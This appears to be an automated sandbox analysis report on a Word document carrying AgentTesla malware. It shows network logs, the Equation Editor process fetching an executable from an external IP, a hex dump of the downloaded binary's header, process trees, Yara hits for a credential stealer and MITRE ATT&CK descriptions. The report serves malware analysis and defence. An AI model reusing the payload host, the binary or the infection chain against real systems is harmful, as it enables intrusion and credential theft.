May 4, 2021 22:01:56.555816889 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555839062 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555840969 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555864096 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555864096 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555876970 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555895090 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555906057 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555922985 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555936098 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555948973 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555973053 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555974007 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555985928 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555999041 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.556020021 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.556021929 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.556045055 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.556056976 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.558605909 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.604773045 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604809046 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604825974 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604842901 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604942083 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604945898 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605000019 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605022907 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605025053 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605040073 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605045080 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605067968 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605076075 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605087042 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605093956 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605106115 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605118990 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605123997 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605140924 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605156898 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605164051 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605175018 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605186939 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605195999 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605211973 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605223894 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605235100 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605242968 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605257988 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605281115 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605283022 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605295897 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605307102 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605315924 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605329990 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605340004 CEST	49167	80	192.168.2.22	31.210.20.6

HTTP Request Dependency Graph

31.210.20.6

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	31.210.20.6	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 4, 2021 22:01:56.453454018 CEST	0	OUT	GET /3/44444.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 31.210.20.6 Connection: Keep-Alive
May 4, 2021 22:01:56.505009890 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 04 May 2021 20:01:56 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Mon, 03 May 2021 22:54:49 GMT ETag: "53d38-5c174d9438040" Accept-Ranges: bytes Content-Length: 343352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 80 90 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d2 04 00 00 4a 00 00 00 00 00 00 5e f0 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f0 04 00 4b 00 00 00 00 00 05 00 2c 47 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 38 1f 00 00 00 60 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d0 04 00 00 20 00 00 00 d2 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 47 00 00 00 00 05 00 00 48 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f0 04 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 4a 00 00 24 2c 00 00 03 00 00 00 01 00 00 06 04 77 00 00 06 79 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 06 00 8c 00 00 00 00 00 00 00 1e 3a 05 00 00 00 dd 10 00 00 00 28 2f 00 00 06 38 f1 ff ff ff 26 dd 00 00 00 00 28 01 00 00 0a 14 fe 06 02 00 00 06 73 02 00 00 0a 6f 03 00 00 0a 20 b7 3e 6e 89 28 35 00 00 06 19 3a 36 00 00 00 26 20 81 3e 6e 89 28 35 00 00 06 17 8d 08 00 00 01 25 16 28 2d 00 00 06 a2 1a 3a 21 00 00 00 26 26 20 61 3e 6e 89 28 35 00 00 06 28 27 00 00 06 26 38 14 00 00 00 28 28 00 00 06 38 c1 ff ff ff 28 2a 00 00 06 38 d7 ff ff ff 2a 01 10 00 00 00 00 00 00 15 15 00 06 01 00 00 01 1b 30 04 00 dc 00 00 00 01 00 00 11 28 04 00 00 0a d0 02 00 00 02 28 05 00 00 0a 6f 06 00 00 0a 20 5e 3e 6e 89 28 35 00 00 06 28 07 00 00 0a 6f 08 00 00 0a 18 3a 06 00 00 00 26 38 06 00 00 00 0a 38 00 00 00 00 73 09 00 00 0a 1b 3a 1f 00 00 00 26 06 08 6f 0a 00 00 0a 08 6f 0b 00 00 0a 73 0c 00 00 0a 16 39 0c 00 00 00 26 38 0c 00 00 00 0c 38 dc ff ff ff 0d 38 00 00 00 00 73 09 00 00 0a 0b 09 16 73 0d 00 00 0a 73 0e 00 00 0a 13 04 11 04 07 6f 0a 00 00 0a dd 08 00 00 00 11 04 6f 0f 00 00 0a dc 07 6f 0b 00 00 0a 13 05 dd 07 00 00 00 07 6f 0f 00 00 0a dc dd 07 00 00 00 09 6f 0f 00 00 0a dc 28 01 00 00 0a 11 05 6f 10 00 00 0a 13 06 dd 0d 00 00 00 06 39 06 00 00 00 06 6f 0f 00 00 0a dc 11 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH`J^ @ @K,G8` H.textd `.rsrc,GH@@.reloc`@B@HJ$,wy0:(/8&(so >n(5:6& >n(5%(-:!&& a>n(5('&8((8(80((o ^>n(5(o:&88s:&oos9&888sssooooo(o9o

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2464 Parent PID: 584

General

Start time:	22:01:37
Start date:	04/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f910000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2564 Parent PID: 584

General

Start time:	22:01:57
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: tthxx.exe PID: 2928 Parent PID: 2564

General

Start time:	22:01:58
Start date:	04/05/2021
Path:	C:\Users\user\tthxx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\tthxx.exe
Imagebase:	0x940000
File size:	343352 bytes
MD5 hash:	CCE6C363C0FF7AC663CD71C5906069A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 40%, ReversingLabs
Reputation:	low

Analysis Process: EQNEDT32.EXE PID: 3028 Parent PID: 584

General

Start time:	22:01:59
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2452 Parent PID: 584

General

Start time:	22:02:05
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: tthxx.exe PID: 2880 Parent PID: 2452

General

Start time:	22:02:06
Start date:	04/05/2021
Path:	C:\Users\user\tthxx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\tthxx.exe
Imagebase:	0x940000
File size:	343352 bytes
MD5 hash:	CCE6C363C0FF7AC663CD71C5906069A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: EQNEDT32.EXE PID: 2140 Parent PID: 584

General

Start time:	22:02:07
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2196 Parent PID: 584

General

Start time:	22:02:07
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: tthxx.exe PID: 2312 Parent PID: 2928

General

Start time:	22:02:51
Start date:	04/05/2021
Path:	C:\Users\user\AppData\Local\Temp\tthxx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\tthxx.exe
Imagebase:	0x130000
File size:	343352 bytes
MD5 hash:	CCE6C363C0FF7AC663CD71C5906069A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 40%, ReversingLabs
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report IMG_05412_868_21.docx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/404303/sample/IMG_05412_868_21.docx"

Indicators

Summary

Document Summary

Streams

Stream Path: \x1oLE10naTiVE, File Type: data, Stream Size: 1420

General

Network Behavior

Snort IDS Alerts

Network Port Distribution